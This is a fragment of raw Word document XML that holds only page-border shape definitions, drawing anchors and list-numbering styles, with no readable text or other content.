                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50575" style="position:absolute;width:68061;height:91;left:746;top:563;" coordsize="6806184,9144" path="m0,0l6806184,0l6806184,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50576" style="position:absolute;width:68061;height:91;left:746;top:655;" coordsize="6806184,9144" path="m0,0l6806184,0l6806184,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50577" style="position:absolute;width:91;height:746;left:69463;top:0;" coordsize="9144,74676" path="m0,0l9144,0l9144,74676l0,74676l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50578" style="position:absolute;width:746;height:91;left:68808;top:0;" coordsize="74676,9144" path="m0,0l74676,0l74676,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50579" style="position:absolute;width:91;height:655;left:69372;top:91;" coordsize="9144,65532" path="m0,0l9144,0l9144,65532l0,65532l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50580" style="position:absolute;width:655;height:91;left:68808;top:91;" coordsize="65532,9144" path="m0,0l65532,0l65532,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50581" style="position:absolute;width:381;height:563;left:68991;top:182;" coordsize="38100,56388" path="m0,0l38100,0l38100,56388l0,56388l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50582" style="position:absolute;width:563;height:381;left:68808;top:182;" coordsize="56388,38100" path="m0,0l56388,0l56388,38100l0,38100l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50583" style="position:absolute;width:91;height:182;left:68900;top:563;" coordsize="9144,18288" path="m0,0l9144,0l9144,18288l0,18288l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50584" style="position:absolute;width:182;height:91;left:68808;top:563;" coordsize="18288,9144" path="m0,0l18288,0l18288,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50585"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375B0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1340" w:right="10583"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wpg">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="169F354E" wp14:editId="74CCACAD">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>304800</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>304800</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6955536" cy="74676"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="47372" name="Group 47372"/>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494" name="Shape 5049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5" name="Shape 50495"/>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6" name="Shape 50496"/>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97" name="Shape 50497"/>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98" name="Shape 50498"/>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9" name="Shape 5049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0" name="Shape 50500"/>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1" name="Shape 50501"/>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2" name="Shape 50502"/>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3" name="Shape 50503"/>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4" name="Shape 50504"/>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5" name="Shape 50505"/>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6" name="Shape 50506"/>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7" name="Shape 50507"/>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8" name="Shape 50508"/>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9" name="Shape 50509"/>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0" name="Shape 50510"/>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1" name="Shape 50511"/>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2" name="Shape 50512"/>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3" name="Shape 50513"/>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4" name="Shape 50514"/>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5" name="Shape 50515"/>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6" name="Shape 50516"/>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72" style="width:547.68pt;height:5.88pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:24pt;" coordsize="69555,746">
              <v:shape id="Shape 50517" style="position:absolute;width:91;height:746;left:0;top:0;" coordsize="9144,74676" path="m0,0l9144,0l9144,74676l0,74676l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50518" style="position:absolute;width:746;height:91;left:0;top:0;" coordsize="74676,9144" path="m0,0l74676,0l74676,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50519" style="position:absolute;width:91;height:655;left:91;top:91;" coordsize="9144,65532" path="m0,0l9144,0l9144,65532l0,65532l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50520" style="position:absolute;width:655;height:91;left:91;top:91;" coordsize="65532,9144" path="m0,0l65532,0l65532,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50521" style="position:absolute;width:381;height:563;left:182;top:182;" coordsize="38100,56388" path="m0,0l38100,0l38100,56388l0,56388l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50522" style="position:absolute;width:563;height:381;left:182;top:182;" coordsize="56388,38100" path="m0,0l56388,0l56388,38100l0,38100l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50523" style="position:absolute;width:91;height:182;left:563;top:563;" coordsize="9144,18288" path="m0,0l9144,0l9144,18288l0,18288l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50524" style="position:absolute;width:182;height:91;left:563;top:563;" coordsize="18288,9144" path="m0,0l18288,0l18288,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50525" style="position:absolute;width:91;height:91;left:655;top:655;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50526" style="position:absolute;width:68061;height:91;left:746;top:0;" coordsize="6806184,9144" path="m0,0l6806184,0l6806184,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50527" style="position:absolute;width:68061;height:91;left:746;top:91;" coordsize="6806184,9144" path="m0,0l6806184,0l6806184,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50528" style="position:absolute;width:68061;height:381;left:746;top:182;" coordsize="6806184,38100" path="m0,0l6806184,0l6806184,38100l0,38100l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50529" style="position:absolute;width:68061;height:91;left:746;top:563;" coordsize="6806184,9144" path="m0,0l6806184,0l6806184,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50530" style="position:absolute;width:68061;height:91;left:746;top:655;" coordsize="6806184,9144" path="m0,0l6806184,0l6806184,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50531" style="position:absolute;width:91;height:746;left:69463;top:0;" coordsize="9144,74676" path="m0,0l9144,0l9144,74676l0,74676l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50532" style="position:absolute;width:746;height:91;left:68808;top:0;" coordsize="74676,9144" path="m0,0l74676,0l74676,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50533" style="position:absolute;width:91;height:655;left:69372;top:91;" coordsize="9144,65532" path="m0,0l9144,0l9144,65532l0,65532l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50534" style="position:absolute;width:655;height:91;left:68808;top:91;" coordsize="65532,9144" path="m0,0l65532,0l65532,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50535" style="position:absolute;width:381;height:563;left:68991;top:182;" coordsize="38100,56388" path="m0,0l38100,0l38100,56388l0,56388l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50536" style="position:absolute;width:563;height:381;left:68808;top:182;" coordsize="56388,38100" path="m0,0l56388,0l56388,38100l0,38100l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50537" style="position:absolute;width:91;height:182;left:68900;top:563;" coordsize="9144,18288" path="m0,0l9144,0l9144,18288l0,18288l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50538" style="position:absolute;width:182;height:91;left:68808;top:563;" coordsize="18288,9144" path="m0,0l18288,0l18288,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50539"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A92EC" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1340" w:right="10583"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wpg">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="40BD74FD" wp14:editId="3F3DD82A">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>304800</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>304800</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6955536" cy="74676"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="47310" name="Group 47310"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                  <wpg:wgp>
                    <wpg:cNvGrpSpPr/>
                    <wpg:grpSpPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6955536" cy="74676"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="6955536" cy="74676"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wps:wsp>
                      <wps:cNvPr id="50448" name="Shape 5044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9" name="Shape 50449"/>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0" name="Shape 50450"/>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51" name="Shape 50451"/>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52" name="Shape 50452"/>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3" name="Shape 5045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4" name="Shape 50454"/>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55" name="Shape 50455"/>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56" name="Shape 50456"/>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7" name="Shape 50457"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="74676" y="0"/>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8" name="Shape 50458"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="74676" y="9144"/>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59" name="Shape 50459"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="74676" y="18288"/>
                          <a:ext cx="6806184" cy="38100"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="0" t="0" r="0" b="0"/>
                          <a:pathLst>
                            <a:path w="6806184" h="38100">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="6806184" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="680618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0" name="Shape 50460"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="74676" y="56388"/>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61" name="Shape 50461"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="74676" y="65532"/>
                          <a:ext cx="6806184" cy="9144"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="0" t="0" r="0" b="0"/>
                          <a:pathLst>
                            <a:path w="6806184" h="9144">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="6806184" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="68061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2" name="Shape 50462"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="69463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3" name="Shape 50463"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="688086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4" name="Shape 50464"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="69372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65" name="Shape 50465"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="6880860"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66" name="Shape 50466"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="689914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7" name="Shape 50467"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="688086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8" name="Shape 50468"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="6890004"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69" name="Shape 50469"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="6880860"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70" name="Shape 50470"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="6880860"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10" style="width:547.68pt;height:5.88pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:24pt;" coordsize="69555,746">
              <v:shape id="Shape 50471" style="position:absolute;width:91;height:746;left:0;top:0;" coordsize="9144,74676" path="m0,0l9144,0l9144,74676l0,74676l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50472" style="position:absolute;width:746;height:91;left:0;top:0;" coordsize="74676,9144" path="m0,0l74676,0l74676,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50473" style="position:absolute;width:91;height:655;left:91;top:91;" coordsize="9144,65532" path="m0,0l9144,0l9144,65532l0,65532l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50474" style="position:absolute;width:655;height:91;left:91;top:91;" coordsize="65532,9144" path="m0,0l65532,0l65532,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50475" style="position:absolute;width:381;height:563;left:182;top:182;" coordsize="38100,56388" path="m0,0l38100,0l38100,56388l0,56388l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50476" style="position:absolute;width:563;height:381;left:182;top:182;" coordsize="56388,38100" path="m0,0l56388,0l56388,38100l0,38100l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50477" style="position:absolute;width:91;height:182;left:563;top:563;" coordsize="9144,18288" path="m0,0l9144,0l9144,18288l0,18288l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50478" style="position:absolute;width:182;height:91;left:563;top:563;" coordsize="18288,9144" path="m0,0l18288,0l18288,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50479" style="position:absolute;width:91;height:91;left:655;top:655;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50480" style="position:absolute;width:68061;height:91;left:746;top:0;" coordsize="6806184,9144" path="m0,0l6806184,0l6806184,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50481" style="position:absolute;width:68061;height:91;left:746;top:91;" coordsize="6806184,9144" path="m0,0l6806184,0l6806184,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50482" style="position:absolute;width:68061;height:381;left:746;top:182;" coordsize="6806184,38100" path="m0,0l6806184,0l6806184,38100l0,38100l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50483" style="position:absolute;width:68061;height:91;left:746;top:563;" coordsize="6806184,9144" path="m0,0l6806184,0l6806184,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50484" style="position:absolute;width:68061;height:91;left:746;top:655;" coordsize="6806184,9144" path="m0,0l6806184,0l6806184,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50485" style="position:absolute;width:91;height:746;left:69463;top:0;" coordsize="9144,74676" path="m0,0l9144,0l9144,74676l0,74676l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50486" style="position:absolute;width:746;height:91;left:68808;top:0;" coordsize="74676,9144" path="m0,0l74676,0l74676,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50487" style="position:absolute;width:91;height:655;left:69372;top:91;" coordsize="9144,65532" path="m0,0l9144,0l9144,65532l0,65532l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50488" style="position:absolute;width:655;height:91;left:68808;top:91;" coordsize="65532,9144" path="m0,0l65532,0l65532,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50489" style="position:absolute;width:381;height:563;left:68991;top:182;" coordsize="38100,56388" path="m0,0l38100,0l38100,56388l0,56388l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50490" style="position:absolute;width:563;height:381;left:68808;top:182;" coordsize="56388,38100" path="m0,0l56388,0l56388,38100l0,38100l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50491" style="position:absolute;width:91;height:182;left:68900;top:563;" coordsize="9144,18288" path="m0,0l9144,0l9144,18288l0,18288l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50492" style="position:absolute;width:182;height:91;left:68808;top:563;" coordsize="18288,9144" path="m0,0l18288,0l18288,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50493" style="position:absolute;width:91;height:91;left:68808;top:655;"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46434F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D912350A"/>
    <w:lvl w:ilvl="0" w:tplc="10585E5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CE808E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="13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02E708">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="20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68526C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="28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E4C420">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="353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F447EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="425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7C80D8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="49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E6B89C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="56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3D458B0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="641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9011A3D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8FA4FF3A"/>
    <w:lvl w:ilvl="0" w:tplc="017643F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E50481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898932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D480F7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A6CE4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39E7E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0A44FB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28CDC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AE08A8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E1E0F56"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="25A80C44"/>
    <w:lvl w:ilvl="0" w:tplc="DA3844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FC317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AA45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6044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2C5C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CAF2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B2F0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2A0B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C6A0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24D68E8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B3A41178"/>
    <w:lvl w:ilvl="0" w:tplc="7E9A3D60">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>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887AEC">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A6A9E6">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486FDC">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6ECCA8">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4A4892">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1480DA">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1018F8">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F46092">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DC74CDD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="18C47320"/>
    <w:lvl w:ilvl="0" w:tplc="2B62BC54">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="363"/>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1" w:tplc="8B20ACDA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="144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2" w:tplc="CD0E18E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="216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3" w:tplc="FA0892A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="288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4" w:tplc="5CE07972">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360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5" w:tplc="80941FE8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="432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6" w:tplc="7EA2A288">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="504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7" w:tplc="E0BAE1C6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="576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lvl w:ilvl="8" w:tplc="F82443DE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe U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2836084"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E7483DFA"/>
    <w:lvl w:ilvl="0" w:tplc="19C4C6F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3405E4">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578AB3CA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
